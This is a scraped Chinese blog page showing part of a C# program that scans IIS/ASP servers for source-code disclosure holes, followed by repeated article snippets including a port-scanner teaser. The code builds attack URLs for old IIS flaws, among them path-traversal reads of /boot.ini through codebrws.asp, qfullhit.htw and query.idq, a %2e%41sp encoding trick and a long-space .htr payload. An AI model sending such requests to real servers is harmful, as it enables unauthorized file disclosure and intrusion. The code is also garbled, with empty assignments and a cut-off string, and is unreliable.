//主要方法
protected void btngo_click (object sender, system.eventargs e)
;//定義分割符為"."
char line = ;//定義分割符為"."
string arrstring = strurl.split(line) ;
//求asp檔案全名
string strfilename = arrstring[arrstring.length - 1] ;
//求從根目錄下的路徑
string strpath = strurl.substring( 0 ,
strurl.length - strfilename.length) ;
//解析檔案全名
arrstring = strfilename.split(point) ;
//求副檔名
string strlast = arrstring[arrstring.length - 1] ;
//求檔名
string strfirst = strfilename.substring( 0 ,
strfilename.length - strlast.length - 1) ;
//使按鈕、輸入框等失效
this.barstatus.text = "正在鏈結主機…" ;
string strrequestfile ;
switch (this.cbomethod.selectedindex)
{ case 0: //直接讀取
strrequestfile = strserver + strurl ;
break ;
case 5 : //%2e%41sp
strrequestfile = strserver + strpath + strfirst
+ "%2e%41sp" ;
break ;
case 8 : //longhtr
strrequestfile = strserver + strurl
+ "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
break ;
case 10: //codebrws.asp
strrequestfile = strserver + "/iissamples/exair/howitworks/codebrws.asp?source="
+ strurl ;
break ;
case 11: //showcode.asp
strrequestfile = strserver + "/iissamples/exair/howitworks/codebrws.asp?source="
+ "/msadc/../../../../boot.ini" ;
break;
case 12 : //null.htw
strrequestfile = strserver + "/null.htw?ciwebhitsfile="
+ strurl + "%20&cirestriction=none&cihilitetype=full" ;
break ;
case 13 : //qfullhit.htw
strrequestfile = strserver + "/iissamples/issamples/oop/qfullhit.htw?"
+ "ciwebhitsfile=/../../boot.ini&cirestriction=none"
+ "&cihilitetype=full";
break ;
case 14 : //qsumrhit.htw
strrequestfile = strserver + "/iissamples/issamples/oop/qsumrhit.htw?"
+ "ciwebhitsfile=/../../boot.ini&cirestriction=none"
+ "&cihilitetype=full";
break ;
case 15 : //query.idq
strrequestfile = strserver + "/query.idq?citemplate=/../../boot.ini"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%2
本文**
乙個用c 寫的掃瞄asp原始碼漏洞的應用程式 續
主要方法 protected void btngo click object sender,system.eventargs e 定義分割符為 char line 定義分割符為 string arrstring strurl.split line 求asp檔案全名 string strfilenam...
乙個用c 寫的掃瞄asp原始碼漏洞的應用程式 續
主要方法 protected void btngo click object sender,system.eventargs e 定義分割符為 char line 定義分割符為 string arrstring strurl.split line 求asp檔案全名 string strfilenam...
用C寫的乙個掃瞄器原始碼
include include 編譯時需使用的庫 pragma comment lib,wsock32.lib select 成員定義 define zero fd set 0 變數定義 int maxth,scanok,scannum int portip,hoststart,hoststop,s...